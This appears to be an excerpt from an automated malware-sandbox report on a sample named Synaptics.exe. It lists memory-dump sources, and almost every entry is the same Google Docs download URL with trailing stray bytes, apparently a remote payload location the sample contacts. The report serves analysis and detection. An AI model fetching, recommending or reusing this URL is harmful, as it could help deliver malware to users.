                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_?
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_aD
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_g
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_l
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_n
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada/
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada1
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada8
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadac
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadads
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadah
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadany
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadapY.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb9
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbdn.
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbiMX
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbp
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc6=
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc=
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceB
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell6
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnn
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcoTJF
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcroso
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dl
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctingsw
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.moo
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd?
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddT
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddfO_:
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade3
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin_w
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeflig
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelleme
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetle
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadepM3fY:Y
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaders
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades).
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesolv
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetz
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadev
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf~
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg-
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgjN
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgk
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl1
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgq
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgsB
                                      Source: Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgstat
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh3
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhM:
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhostn
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-cn.net
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi2
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi?
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadified
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadigH
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadit
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadits
                                      Source: Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiw
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor..
